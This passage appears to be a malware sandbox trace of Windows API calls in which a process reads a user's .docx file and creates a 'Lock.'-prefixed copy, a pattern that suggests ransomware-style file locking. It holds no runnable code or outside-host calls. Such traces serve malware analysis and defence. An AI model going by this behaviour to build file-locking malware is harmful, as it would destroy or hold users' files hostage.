[0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0222.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0222.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0222.151] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/YBBoLDeAtb.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ybboldeatb.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0222.152] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.152] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0222.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0222.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0222.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0222.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0222.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.152] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0222.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0222.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0222.152] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0222.152] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0222.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0222.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0222.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0222.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0222.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0222.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0222.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0222.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0222.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0222.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0222.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0222.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0222.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854d58 [0222.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0222.153] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0222.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854d58 | out: hHeap=0x2af0000) returned 1 [0222.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0222.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0222.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0222.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0222.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0222.154] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.YBBoLDeAtb.docx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.ybboldeatb.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0222.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0222.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0222.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0222.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0222.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.155] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0222.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0222.156] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0222.156] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0222.156] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0222.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0222.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0222.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0222.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0222.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0222.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0222.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0222.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54ef020 [0222.160] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0222.160] ReadFile (in: hFile=0x50c, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0222.162] ReadFile (in: hFile=0x50c, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x984, lpOverlapped=0x0) returned 1 [0222.162] ReadFile (in: hFile=0x50c, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0222.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0222.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0222.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10984) returned 0x2a8a138 [0222.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54ef020 | out: hHeap=0x2af0000) returned 1 [0222.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0222.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0222.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0222.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0222.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0222.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0222.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10984) returned 0x2aae878 [0222.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0222.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0222.168] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0222.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0222.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0222.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10984) returned 0x2a8a138 [0222.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0222.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0222.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0222.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0222.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0222.168] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0222.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0222.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0222.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0222.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0222.169] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0222.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0222.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10984) returned 0x2a8a138 [0222.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0222.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0222.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0222.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf48 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0222.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0222.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10984) returned 0x2abf208 [0222.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0222.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0222.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0222.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0222.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0222.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0222.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0222.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0222.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0222.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0222.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0222.172] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0222.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0222.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0222.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0222.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0222.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0222.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0222.173] PeekMessageW 